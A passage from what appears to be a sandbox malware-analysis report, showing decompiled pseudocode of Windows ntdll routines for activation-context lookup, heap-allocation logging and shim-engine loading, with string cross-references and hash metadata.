                                                                            					if(_t209 != 0) {
                                                                            						L5:
                                                                            						if( *_t209 < 0x24) {
                                                                            							goto L49;
                                                                            						}
                                                                            						L6:
                                                                            						if((_t241 & 0x00000002) != 0) {
                                                                            							if(_t209 + 0x2c <=  *_t209 + _t209) {
                                                                            								goto L7;
                                                                            							}
                                                                            							_push(0xc000000d);
                                                                            							_push("RtlpFindActivationContextSection_CheckParameters");
                                                                            							_push("SXS: %s() flags contains return_flags but they don\'t fit in size, return invalid_parameter 0x%08lx.\n");
                                                                            							L48:
                                                                            							_push(0);
                                                                            							_push(0x33);
                                                                            							E1D85EF10();
                                                                            							_t258 = _t258 + 0x14;
                                                                            							goto L49;
                                                                            						}
                                                                            						L7:
                                                                            						if((_t241 & 0x00000004) != 0) {
                                                                            							if(_t209 + 0x40 <=  *_t209 + _t209) {
                                                                            								goto L8;
                                                                            							}
                                                                            							_push(0xc000000d);
                                                                            							_push("RtlpFindActivationContextSection_CheckParameters");
                                                                            							_push("SXS: %s() flags contains return_assembly_metadata but they don\'t fit in size, return invalid_parameter 0x%08lx.\n");
                                                                            							goto L48;
                                                                            						}
                                                                            						L8:
                                                                            						_t241 =  &_v76;
                                                                            						_v48 = _a12;
                                                                            						_v60 = 0x18;
                                                                            						_v56 = 0;
                                                                            						_v52 = _t252;
                                                                            						_v40 = 0;
                                                                            						_v64 = 0;
                                                                            						_v44 = 0;
                                                                            						if(E1D7ED580( &_v60,  &_v76,  &_v88,  &_v64) < 0) {
                                                                            							goto L24;
                                                                            						}
                                                                            						_t151 = 0;
                                                                            						if(0 < 0) {
                                                                            							goto L24;
                                                                            						}
                                                                            						_t158 = _v88;
                                                                            						if(_t158 < 0x28) {
                                                                            							L34:
                                                                            							_t254 = _v76;
                                                                            							L91:
                                                                            							_push(_t158);
                                                                            							E1D85EF10(0x33, 0, "RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section\n", _t254);
                                                                            							_t258 = _t258 + 0x14;
                                                                            							_t151 = 0xc0150003;
                                                                            							goto L24;
                                                                            						}
                                                                            						_t247 = _v64;
                                                                            						while(1) {
                                                                            							L12:
                                                                            							_t254 = _v76;
                                                                            							if( *_t254 != 0x64487347) {
                                                                            								goto L91;
                                                                            							}
                                                                            							_t211 =  *((intOrPtr*)(_t254 + 0x14));
                                                                            							_t160 = 1;
                                                                            							if(_t211 == 0) {
                                                                            								L19:
                                                                            								_t225 =  *[fs:0x18];
                                                                            								_t255 = _v44;
                                                                            								_v92 = 0;
                                                                            								_t247 = 0;
                                                                            								_v68 = _t225;
                                                                            								_t241 =  *(_t225 + 0x30);
                                                                            								_v72 = _t241;
                                                                            								L20:
                                                                            								while(1) {
                                                                            									if(_t255 <= 2) {
                                                                            										_t163 = _t255;
                                                                            										if(_t163 == 0) {
                                                                            											_t164 =  *((intOrPtr*)(_t225 + 0x1a8));
                                                                            											if(_t164 == 0) {
                                                                            												L43:
                                                                            												_t213 =  *((intOrPtr*)(_t241 + 0x1f8));
                                                                            												_v92 = 0;
                                                                            												if(_t213 == 0) {
                                                                            													L28:
                                                                            													_t213 =  *((intOrPtr*)(_t241 + 0x200));
                                                                            													_v92 = 0xfffffffc;
                                                                            													if(_t213 == 0) {
                                                                            														goto L21;
                                                                            													}
                                                                            													_t255 = 3;
                                                                            													_v44 = 3;
                                                                            													L22:
                                                                            													if(_t213 != 0) {
                                                                            														_t241 = _v52;
                                                                            														_t151 = E1D7EA600(_t213, _v52, _v48,  &_v76,  &_v88);
                                                                            														if(_t151 < 0) {
                                                                            															if(_t151 != 0xc0150001 || _t255 == 3) {
                                                                            																L32:
                                                                            																if(_t151 < 0) {
                                                                            																	if(_t151 != 0xc0150001) {
                                                                            																		goto L24;
                                                                            																	}
                                                                            																	goto L23;
                                                                            																}
                                                                            																_t158 = _v88;
                                                                            																if(_t158 >= 0x28) {
                                                                            																	goto L12;
                                                                            																}
                                                                            																goto L34;
                                                                            															} else {
                                                                            																_t225 = _v68;
                                                                            																_t241 = _v72;
                                                                            																continue;
                                                                            															}
                                                                            														}
                                                                            														_t241 = _v92;
                                                                            														_v40 = (0 | _t241 != 0xfffffffc) - 0x00000001 & 0x00000002 | 0 | _t241 == 0x00000000;
                                                                            														asm("sbb edi, edi");
                                                                            														_t247 =  ~(_t241 - 0xfffffffc) & _t241;
                                                                            														_t151 = 0;
                                                                            														goto L32;
                                                                            													}
                                                                            													L23:
                                                                            													_t151 = 0xc0150008;
                                                                            													goto L24;
                                                                            												}
                                                                            												_t255 = 2;
                                                                            												_v44 = 2;
                                                                            												goto L22;
                                                                            											}
                                                                            											_t170 =  *_t164;
                                                                            											if(_t170 == 0) {
                                                                            												goto L43;
                                                                            											}
                                                                            											_t171 =  *((intOrPtr*)(_t170 + 4));
                                                                            											_v92 = _t171;
                                                                            											if(_t171 == 0) {
                                                                            												L83:
                                                                            												if(_t213 == 0) {
                                                                            													goto L43;
                                                                            												}
                                                                            												L84:
                                                                            												_t255 = 1;
                                                                            												_v44 = 1;
                                                                            												goto L22;
                                                                            											}
                                                                            											if(_t171 != 0xfffffffc) {
                                                                            												if(_t171 != 0xfffffffd) {
                                                                            													_t213 =  *((intOrPtr*)(_t171 + 0x10));
                                                                            													goto L83;
                                                                            												}
                                                                            												_t213 = "Actx ";
                                                                            												goto L84;
                                                                            											}
                                                                            											_t213 =  *((intOrPtr*)(_t241 + 0x200));
                                                                            											goto L83;
                                                                            										}
                                                                            										_t172 = _t163 - 1;
                                                                            										if(_t172 == 0) {
                                                                            											goto L43;
                                                                            										}
                                                                            										if(_t172 != 1) {
                                                                            											goto L21;
                                                                            										}
                                                                            										goto L28;
                                                                            									}
                                                                            									L21:
                                                                            									if(_t255 > 3) {
                                                                            										_t151 = 0xc00000e5;
                                                                            										goto L24;
                                                                            									}
                                                                            									goto L22;
                                                                            								}
                                                                            							}
                                                                            							if( *((intOrPtr*)(_t254 + 8)) != 1) {
                                                                            								_t160 = 0;
                                                                            							}
                                                                            							_t227 =  *((intOrPtr*)(_t254 + 0x1c));
                                                                            							if(_t227 != 0) {
                                                                            								if(_t160 == 0) {
                                                                            									goto L16;
                                                                            								}
                                                                            								_v92 = 0;
                                                                            								_t233 =  *((intOrPtr*)(_t227 + _t254 + 4)) +  *_v84 %  *(_t227 + _t254) * 8;
                                                                            								_t234 = _t233 + _t254;
                                                                            								_t201 =  *((intOrPtr*)(_t233 + _t254 + 4)) + _t254;
                                                                            								_v72 = _t234;
                                                                            								if( *_t234 <= 0) {
                                                                            									goto L19;
                                                                            								} else {
                                                                            									goto L54;
                                                                            								}
                                                                            								while(1) {
                                                                            									L54:
                                                                            									_t214 =  *_t201 + _t254;
                                                                            									_v68 = _t201 + 4;
                                                                            									if(E1D828050(_t214, _v84, 0x10) == 0x10) {
                                                                            										goto L18;
                                                                            									}
                                                                            									_t205 = _v92 + 1;
                                                                            									_v92 = _t205;
                                                                            									_t201 = _v68;
                                                                            									if(_t205 <  *_v72) {
                                                                            										continue;
                                                                            									}
                                                                            									goto L19;
                                                                            								}
                                                                            							} else {
                                                                            								L16:
                                                                            								_t228 =  *((intOrPtr*)(_t254 + 0x18));
                                                                            								if(( *(_t254 + 0x10) & 0x00000001) == 0) {
                                                                            									_t174 = _t228 + _t254;
                                                                            									_v92 = _t228 + _t254;
                                                                            									while(E1D828050(_t174, _v84, 0x10) != 0x10) {
                                                                            										_t174 = _v92 + 0x1c;
                                                                            										_v92 = _v92 + 0x1c;
                                                                            										_t211 = _t211 - 1;
                                                                            										if(_t211 != 0) {
                                                                            											continue;
                                                                            										}
                                                                            										goto L19;
                                                                            									}
                                                                            									_t214 = _v92;
                                                                            									L18:
                                                                            									if(_t214 != 0) {
                                                                            										if( *((intOrPtr*)(_t214 + 0x10)) == 0) {
                                                                            											goto L19;
                                                                            										}
                                                                            										_t241 = _v80;
                                                                            										if(_t241 != 0) {
                                                                            											 *((intOrPtr*)(_t241 + 4)) =  *((intOrPtr*)(_t254 + 0xc));
                                                                            											 *((intOrPtr*)(_t241 + 8)) =  *((intOrPtr*)(_t214 + 0x10)) + _t254;
                                                                            											 *((intOrPtr*)(_t241 + 0xc)) =  *((intOrPtr*)(_t214 + 0x14));
                                                                            											if(_t241 + 0x28 <=  *_t241 + _t241) {
                                                                            												 *((intOrPtr*)(_t241 + 0x24)) =  *((intOrPtr*)(_t214 + 0x18));
                                                                            											}
                                                                            										}
                                                                            										if((_t247 - 0x00000001 | 0x00000007) != 0xffffffff) {
                                                                            											_t215 =  *((intOrPtr*)(_t247 + 0x14));
                                                                            											if(_t215 != 0 && (( *(_t247 + 0x1c) & 0x00000008) == 0 || ( *(_t247 + 0x3c) & 0x00000008) == 0)) {
                                                                            												_v93 = 0;
                                                                            												 *0x1d8c91e0(3, _t247,  *((intOrPtr*)(_t247 + 0x10)),  *((intOrPtr*)(_t247 + 0x18)), 0,  &_v93);
                                                                            												 *_t215();
                                                                            												 *(_t247 + 0x1c) =  *(_t247 + 0x1c) | 0x00000008;
                                                                            												_t241 = _v104;
                                                                            												if(_v117 != 0) {
                                                                            													 *(_t247 + 0x3c) =  *(_t247 + 0x3c) | 0x00000008;
                                                                            												}
                                                                            											}
                                                                            										}
                                                                            										if(_t241 == 0 || E1D7D4428(_a4, _t241, _t247,  &_v60, _t254,  *((intOrPtr*)(_t254 + 0x20)),  *((intOrPtr*)(_t254 + 0x24)), _v88) >= 0) {
                                                                            											_t151 = 0;
                                                                            										}
                                                                            										goto L24;
                                                                            									}
                                                                            									goto L19;
                                                                            								}
                                                                            								_t242 = _v84;
                                                                            								_v36 =  *_t242;
                                                                            								_v32 =  *((intOrPtr*)(_t242 + 4));
                                                                            								_v28 =  *((intOrPtr*)(_t242 + 8));
                                                                            								_v24 =  *((intOrPtr*)(_t242 + 0xc));
                                                                            								_t195 = E1D818170( &_v36, _t228 + _t254, _t211, 0x1c, E1D7CB600);
                                                                            								_t258 = _t258 + 0x14;
                                                                            								_t214 = _t195;
                                                                            							}
                                                                            							goto L18;
                                                                            						}
                                                                            						goto L91;
                                                                            					}
                                                                            					goto L6;
                                                                            				}
                                                                            				if(_t209 == 0) {
                                                                            					goto L49;
                                                                            				}
                                                                            				goto L5;
                                                                            			}
                                                                            0x1d839231
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d839237
                                                                            0x1d83923d
                                                                            0x1d839244
                                                                            0x1d83924e
                                                                            0x1d839254
                                                                            0x1d83925c
                                                                            0x1d839261
                                                                            0x1d839261
                                                                            0x1d83925c
                                                                            0x1d83926d
                                                                            0x1d83926f
                                                                            0x1d839274
                                                                            0x1d839286
                                                                            0x1d839299
                                                                            0x1d83929f
                                                                            0x1d8392a1
                                                                            0x1d8392aa
                                                                            0x1d8392ae
                                                                            0x1d8392b0
                                                                            0x1d8392b0
                                                                            0x1d8392ae
                                                                            0x1d839274
                                                                            0x1d8392b6
                                                                            0x1d8392d9
                                                                            0x1d8392d9
                                                                            0x00000000
                                                                            0x1d8392b6
                                                                            0x00000000
                                                                            0x1d7ed807
                                                                            0x1d7ed7cb
                                                                            0x1d7ed7d9
                                                                            0x1d7ed7e0
                                                                            0x1d7ed7e7
                                                                            0x1d7ed7ee
                                                                            0x1d7ed7fb
                                                                            0x1d7ed800
                                                                            0x1d7ed803
                                                                            0x1d7ed803
                                                                            0x00000000
                                                                            0x1d7ed7b8
                                                                            0x00000000
                                                                            0x1d7ed790
                                                                            0x00000000
                                                                            0x1d7ed902
                                                                            0x1d7ed6fb
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000

                                                                            APIs
                                                                            Strings
                                                                            • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1D839153
                                                                            • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 1D839372
                                                                            • Actx , xrefs: 1D839315
                                                                            • RtlpFindActivationContextSection_CheckParameters, xrefs: 1D83914E, 1D839173
                                                                            • GsHd, xrefs: 1D7ED794
                                                                            • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1D839178
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.210670854299.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                            • Associated: 00000004.00000002.210672228455.000000001D8C9000.00000040.00000800.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.210672290922.000000001D8CD000.00000040.00000800.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_1d7a0000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                                            • API String ID: 3446177414-2196497285
                                                                            • Opcode ID: d9212c6f9b32d9ec22d6ac71aec9db4c002abb7a12868cbba956ab23e851eb68
                                                                            • Instruction ID: 4036cfae106490241809d9fefbb62c4a52d8e4ab657873461a747c2b80352f3f
                                                                            • Opcode Fuzzy Hash: d9212c6f9b32d9ec22d6ac71aec9db4c002abb7a12868cbba956ab23e851eb68
                                                                            • Instruction Fuzzy Hash: 9DE1AE706083429FD701CF1CC880B6AB7E5BF88768F044A2EF9999B291D771E845CB93
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 62%
                                                                            			E1D87F0A5(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
                                                                            				signed int _t87;
                                                                            				signed int _t89;
                                                                            				signed int _t92;
                                                                            				intOrPtr _t93;
                                                                            				intOrPtr _t94;
                                                                            				signed char _t105;
                                                                            				signed int _t106;
                                                                            				intOrPtr _t108;
                                                                            				signed int _t109;
                                                                            				signed int _t110;
                                                                            				intOrPtr _t112;
                                                                            				intOrPtr _t116;
                                                                            				short* _t134;
                                                                            				short _t135;
                                                                            				signed char _t153;
                                                                            				signed int* _t158;
                                                                            				short* _t169;
                                                                            				signed int _t174;
                                                                            				signed int _t184;
                                                                            				signed int _t185;
                                                                            				intOrPtr* _t190;
                                                                            				void* _t191;
                                                                            
                                                                            				_push(0x3c);
                                                                            				_push(0x1d8ad320);
                                                                            				E1D827BE4(__ebx, __edi, __esi);
                                                                            				_t188 = __ecx;
                                                                            				 *((intOrPtr*)(_t191 - 0x3c)) = __ecx;
                                                                            				 *((char*)(_t191 - 0x19)) = 0;
                                                                            				 *(_t191 - 0x24) = 0;
                                                                            				if(( *(__ecx + 0x44) & 0x01000000) == 0) {
                                                                            					 *(_t191 - 4) = 0;
                                                                            					 *(_t191 - 4) = 1;
                                                                            					_t87 = E1D7C7662("RtlAllocateHeap");
                                                                            					__eflags = _t87;
                                                                            					if(_t87 == 0) {
                                                                            						L46:
                                                                            						 *(_t191 - 0x24) = 0;
                                                                            						L47:
                                                                            						 *(_t191 - 4) = 0;
                                                                            						 *(_t191 - 4) = 0xfffffffe;
                                                                            						E1D87F3F9();
                                                                            						_t89 =  *(_t191 - 0x24);
                                                                            						goto L48;
                                                                            					}
                                                                            					_t153 =  *(__ecx + 0x44) | __edx;
                                                                            					 *(_t191 - 0x2c) = _t153;
                                                                            					_t183 = _t153 | 0x10000100;
                                                                            					 *(_t191 - 0x34) = _t153 | 0x10000100;
                                                                            					_t174 =  *(_t191 + 8);
                                                                            					__eflags = _t174;
                                                                            					 *(_t191 - 0x20) = _t174;
                                                                            					if(_t174 == 0) {
                                                                            						 *(_t191 - 0x20) = 1;
                                                                            					}
                                                                            					_t92 =  *((intOrPtr*)(_t188 + 0x94)) +  *(_t191 - 0x20) &  *(_t188 + 0x98);
                                                                            					__eflags = _t92 - 0x10;
                                                                            					if(_t92 < 0x10) {
                                                                            						_t92 = 0x10;
                                                                            					}
                                                                            					_t93 = _t92 + 8;
                                                                            					 *((intOrPtr*)(_t191 - 0x40)) = _t93;
                                                                            					__eflags = _t93 - _t174;
                                                                            					if(_t93 < _t174) {
                                                                            						L42:
                                                                            						_t94 =  *[fs:0x30];
                                                                            						__eflags =  *(_t94 + 0xc);
                                                                            						if( *(_t94 + 0xc) == 0) {
                                                                            							_push("HEAP: ");
                                                                            							E1D7CB910();
                                                                            						} else {
                                                                            							E1D7CB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                            						}
                                                                            						_push( *((intOrPtr*)(_t188 + 0x78)));
                                                                            						E1D7CB910("Invalid allocation size - %Ix (exceeded %Ix)\n",  *(_t191 + 8));
                                                                            						goto L46;
                                                                            					} else {
                                                                            						__eflags = _t93 -  *((intOrPtr*)(_t188 + 0x78));
                                                                            						if(_t93 >  *((intOrPtr*)(_t188 + 0x78))) {
                                                                            							goto L42;
                                                                            						}
                                                                            						__eflags = _t153 & 0x00000001;
                                                                            						if((_t153 & 0x00000001) == 0) {
                                                                            							E1D7DFED0( *((intOrPtr*)(_t188 + 0xc8)));
                                                                            							 *((char*)(_t191 - 0x19)) = 1;
                                                                            							_t183 =  *(_t191 - 0x2c) | 0x10000101;
                                                                            							__eflags = _t183;
                                                                            							 *(_t191 - 0x34) = _t183;
                                                                            						}
                                                                            						E1D880835(_t188, 0);
                                                                            						_t184 = E1D7E5D90(_t188, _t188, _t183,  *(_t191 + 8));
                                                                            						 *(_t191 - 0x24) = _t184;
                                                                            						_t176 = 1;
                                                                            						E1D880D24(_t188);
                                                                            						__eflags = _t184;
                                                                            						if(_t184 == 0) {
                                                                            							goto L47;
                                                                            						} else {
                                                                            							_t185 = _t184 + 0xfffffff8;
                                                                            							__eflags =  *((char*)(_t185 + 7)) - 5;
                                                                            							if( *((char*)(_t185 + 7)) == 5) {
                                                                            								_t185 = _t185 - (( *(_t185 + 6) & 0x000000ff) << 3);
                                                                            								__eflags = _t185;
                                                                            							}
                                                                            							_t158 = _t185;
                                                                            							 *(_t191 - 0x38) = _t185;
                                                                            							__eflags =  *(_t188 + 0x4c);
                                                                            							if( *(_t188 + 0x4c) != 0) {
                                                                            								 *_t185 =  *_t185 ^  *(_t188 + 0x50);
                                                                            								__eflags =  *(_t185 + 3) - (_t158[0] ^ _t158[0] ^  *_t158);
                                                                            								if(__eflags != 0) {
                                                                            									_push(_t158);
                                                                            									_t176 = _t185;
                                                                            									E1D88D646(0, _t188, _t185, _t185, _t188, __eflags);
                                                                            								}
                                                                            							}
                                                                            							__eflags =  *(_t185 + 2) & 0x00000002;
                                                                            							if(( *(_t185 + 2) & 0x00000002) == 0) {
                                                                            								_t105 =  *(_t185 + 3);
                                                                            								 *(_t191 - 0x1a) = _t105;
                                                                            								_t106 = _t105 & 0x000000ff;
                                                                            							} else {
                                                                            								_t134 = E1D803AE9(_t185);
                                                                            								 *((intOrPtr*)(_t191 - 0x28)) = _t134;
                                                                            								__eflags =  *(_t188 + 0x40) & 0x08000000;
                                                                            								if(( *(_t188 + 0x40) & 0x08000000) == 0) {
                                                                            									 *_t134 = 0;
                                                                            								} else {
                                                                            									_t135 = E1D7FFDB9(1, _t176);
                                                                            									_t169 =  *((intOrPtr*)(_t191 - 0x28));
                                                                            									 *_t169 = _t135;
                                                                            									_t134 = _t169;
                                                                            								}
                                                                            								_t45 = _t134 + 2; // 0xffff
                                                                            								_t106 =  *_t45 & 0x0000ffff;
                                                                            							}
                                                                            							 *(_t191 - 0x2c) = _t106;
                                                                            							 *(_t191 - 0x20) = _t106;
                                                                            							__eflags =  *(_t188 + 0x4c);
                                                                            							if( *(_t188 + 0x4c) != 0) {
                                                                            								 *(_t185 + 3) =  *(_t185 + 2) ^  *(_t185 + 1) ^  *_t185;
                                                                            								 *_t185 =  *_t185 ^  *(_t188 + 0x50);
                                                                            								__eflags =  *_t185;
                                                                            							}
                                                                            							__eflags =  *(_t188 + 0x40) & 0x20000000;
                                                                            							if(( *(_t188 + 0x40) & 0x20000000) != 0) {
                                                                            								__eflags = 0;
                                                                            								E1D880835(_t188, 0);
                                                                            							}
                                                                            							__eflags =  *(_t191 - 0x24) -  *0x1d8c47c0; // 0x0
                                                                            							_t108 =  *[fs:0x30];
                                                                            							if(__eflags != 0) {
                                                                            								_t109 =  *(_t108 + 0x68);
                                                                            								 *(_t191 - 0x44) = _t109;
                                                                            								__eflags = _t109 & 0x00000800;
                                                                            								if((_t109 & 0x00000800) == 0) {
                                                                            									goto L47;
                                                                            								}
                                                                            								_t110 =  *(_t191 - 0x2c);
                                                                            								__eflags = _t110;
                                                                            								if(_t110 == 0) {
                                                                            									goto L47;
                                                                            								}
                                                                            								__eflags = _t110 -  *0x1d8c47c4; // 0x0
                                                                            								if(__eflags != 0) {
                                                                            									goto L47;
                                                                            								}
                                                                            								__eflags =  *((intOrPtr*)(_t188 + 0x7c)) -  *0x1d8c47c6; // 0x0
                                                                            								if(__eflags != 0) {
                                                                            									goto L47;
                                                                            								}
                                                                            								_t112 =  *[fs:0x30];
                                                                            								__eflags =  *(_t112 + 0xc);
                                                                            								if( *(_t112 + 0xc) == 0) {
                                                                            									_push("HEAP: ");
                                                                            									E1D7CB910();
                                                                            								} else {
                                                                            									E1D7CB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                            								}
                                                                            								_push(E1D87823A(_t188,  *(_t191 - 0x20)));
                                                                            								_push( *(_t191 + 8));
                                                                            								E1D7CB910("Just allocated block at %p for 0x%Ix bytes with tag %ws\n",  *(_t191 - 0x24));
                                                                            								goto L32;
                                                                            							} else {
                                                                            								__eflags =  *(_t108 + 0xc);
                                                                            								if( *(_t108 + 0xc) == 0) {
                                                                            									_push("HEAP: ");
                                                                            									E1D7CB910();
                                                                            								} else {
                                                                            									E1D7CB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                            								}
                                                                            								_push( *(_t191 + 8));
                                                                            								E1D7CB910("Just allocated block at %p for %Ix bytes\n",  *0x1d8c47c0);
                                                                            								L32:
                                                                            								_t116 =  *[fs:0x30];
                                                                            								__eflags =  *((char*)(_t116 + 2));
                                                                            								if( *((char*)(_t116 + 2)) != 0) {
                                                                            									 *0x1d8c47a1 = 1;
                                                                            									 *0x1d8c4100 = 0;
                                                                            									asm("int3");
                                                                            									 *0x1d8c47a1 = 0;
                                                                            								}
                                                                            								goto L47;
                                                                            							}
                                                                            						}
                                                                            					}
                                                                            				} else {
                                                                            					_t190 =  *0x1d8c3748; // 0x0
                                                                            					 *0x1d8c91e0(__ecx, __edx,  *(_t191 + 8));
                                                                            					_t89 =  *_t190();
                                                                            					L48:
                                                                            					 *[fs:0x0] =  *((intOrPtr*)(_t191 - 0x10));
                                                                            					return _t89;
                                                                            				}
                                                                            			}


                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.210670854299.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                            • Associated: 00000004.00000002.210672228455.000000001D8C9000.00000040.00000800.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.210672290922.000000001D8CD000.00000040.00000800.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_1d7a0000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                                            • API String ID: 3446177414-1745908468
                                                                            • Opcode ID: cbeef8f05c629a38f8816311321a324fee4abff850b859db46ce4d388d40490c
                                                                            • Instruction ID: 73196920437d279aa9a587c306c3e17864d3f64ebe1af485a87410147e368457
                                                                            • Opcode Fuzzy Hash: cbeef8f05c629a38f8816311321a324fee4abff850b859db46ce4d388d40490c
                                                                            • Instruction Fuzzy Hash: 95912636908649DFCB02CFA9D840BEDBBF2FF49720F15805AE5459B262C735A941DB12
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 46%
                                                                            			E1D7C640D(void* __ecx) {
                                                                            				signed int _v8;
                                                                            				void* _v12;
                                                                            				void* _v536;
                                                                            				void* _v548;
                                                                            				char _v780;
                                                                            				char* _v784;
                                                                            				char _v788;
                                                                            				char _v792;
                                                                            				intOrPtr _v804;
                                                                            				char _v868;
                                                                            				char* _v872;
                                                                            				short _v874;
                                                                            				char _v876;
                                                                            				void* _v880;
                                                                            				char _v892;
                                                                            				void* _v896;
                                                                            				void* _v900;
                                                                            				void* _v904;
                                                                            				void* __ebx;
                                                                            				void* __edi;
                                                                            				void* __esi;
                                                                            				void* __ebp;
                                                                            				short _t48;
                                                                            				short _t49;
                                                                            				void* _t52;
                                                                            				signed char _t61;
                                                                            				void* _t67;
                                                                            				intOrPtr _t71;
                                                                            				void* _t81;
                                                                            				signed char _t85;
                                                                            				void* _t99;
                                                                            				void* _t100;
                                                                            				void* _t102;
                                                                            				void* _t103;
                                                                            				signed int _t104;
                                                                            				signed int _t106;
                                                                            				signed int _t108;
                                                                            				void* _t109;
                                                                            
                                                                            				_t108 = (_t106 & 0xfffffff8) - 0x374;
                                                                            				_v8 =  *0x1d8cb370 ^ _t108;
                                                                            				_t48 = 0x16;
                                                                            				_v876 = _t48;
                                                                            				_t96 =  &_v876;
                                                                            				_t49 = 0x18;
                                                                            				_v874 = _t49;
                                                                            				_t99 = __ecx;
                                                                            				_v872 = L"apphelp.dll";
                                                                            				_v784 =  &_v780;
                                                                            				_v788 = 0x1000000;
                                                                            				_v780 = 0;
                                                                            				_t52 = E1D7C6C11( &_v788,  &_v876, _t109);
                                                                            				if(_t52 < 0) {
                                                                            					_t85 =  *0x1d8c37c0; // 0x0
                                                                            					__eflags = _t85 & 0x00000003;
                                                                            					if((_t85 & 0x00000003) == 0) {
                                                                            						L12:
                                                                            						__eflags = _t85 & 0x00000010;
                                                                            						L15:
                                                                            						if(__eflags != 0) {
                                                                            							asm("int3");
                                                                            						}
                                                                            						L6:
                                                                            						_t53 =  &_v780;
                                                                            						if( &_v780 != _v784) {
                                                                            							_t53 = E1D7CBA80(_v784);
                                                                            						}
                                                                            						_pop(_t100);
                                                                            						_pop(_t102);
                                                                            						_pop(_t81);
                                                                            						return E1D814B50(_t53, _t81, _v8 ^ _t108, _t96, _t100, _t102);
                                                                            					}
                                                                            					_push(_t52);
                                                                            					_push("Building shim engine DLL system32 filename failed with status 0x%08lx\n");
                                                                            					_push(0);
                                                                            					_push("LdrpInitShimEngine");
                                                                            					_push(0xa35);
                                                                            					L11:
                                                                            					_push("minkernel\\ntdll\\ldrinit.c");
                                                                            					E1D84E692();
                                                                            					_t85 =  *0x1d8c37c0; // 0x0
                                                                            					_t108 = _t108 + 0x18;
                                                                            					goto L12;
                                                                            				}
                                                                            				E1D7EE8A6(0, 0x4001,  &_v868);
                                                                            				_t96 =  &_v872;
                                                                            				_t103 = E1D7C6B45( &_v792,  &_v872, 0,  &_v892);
                                                                            				if(_v804 != 0) {
                                                                            					E1D7FE7E0( &_v792, _v868);
                                                                            				}
                                                                            				_t112 = _t103;
                                                                            				if(_t103 < 0) {
                                                                            					_t61 =  *0x1d8c37c0; // 0x0
                                                                            					__eflags = _t61 & 0x00000003;
                                                                            					if((_t61 & 0x00000003) != 0) {
                                                                            						E1D84E692("minkernel\\ntdll\\ldrinit.c", 0xa48, "LdrpInitShimEngine", 0, "Loading the shim engine DLL failed with status 0x%08lx\n", _t103);
                                                                            						_t61 =  *0x1d8c37c0; // 0x0
                                                                            						_t108 = _t108 + 0x18;
                                                                            					}
                                                                            					__eflags = _t61 & 0x00000010;
                                                                            					goto L15;
                                                                            				} else {
                                                                            					 *( *((intOrPtr*)(_t108 + 0xc)) + 0x34) =  *( *((intOrPtr*)(_t108 + 0xc)) + 0x34) | 0x00000100;
                                                                            					 *0x1d8c5d64 =  *((intOrPtr*)( *((intOrPtr*)(_t108 + 0xc)) + 0x18));
                                                                            					E1D807DF6( *((intOrPtr*)(_t108 + 0xc)));
                                                                            					E1D7ED3E1(0,  *((intOrPtr*)(_t108 + 0xc)), _t103);
                                                                            					_t67 = E1D7C6868( *((intOrPtr*)(_t108 + 0xc)), _t96, _t112);
                                                                            					if(_t67 < 0) {
                                                                            						_t85 =  *0x1d8c37c0; // 0x0
                                                                            						__eflags = _t85 & 0x00000003;
                                                                            						if((_t85 & 0x00000003) == 0) {
                                                                            							goto L12;
                                                                            						}
                                                                            						_push(_t67);
                                                                            						_push("Getting the shim engine exports failed with status 0x%08lx\n");
                                                                            						_push(0);
                                                                            						_push("LdrpInitShimEngine");
                                                                            						_push(0xa56);
                                                                            						goto L11;
                                                                            					}
                                                                            					_t104 =  *0x1d8c9208; // 0x0
                                                                            					_v872 = _t108 + 0x178;
                                                                            					_v876 = 0x2000000;
                                                                            					_t96 =  *0x7ffe0330;
                                                                            					_t71 =  *0x1d8c5b24; // 0x1932c18
                                                                            					asm("ror esi, cl");
                                                                            					 *0x1d8c91e0( &_v876, _t71 + 0x24, _t99, 0x20);
                                                                            					if( *(_t104 ^  *0x7ffe0330)() >= 0) {
                                                                            						E1D7C6565( *((intOrPtr*)(_t108 + 0x14)));
                                                                            						if( *((intOrPtr*)(_t108 + 0x14)) != _t108 + 0x178) {
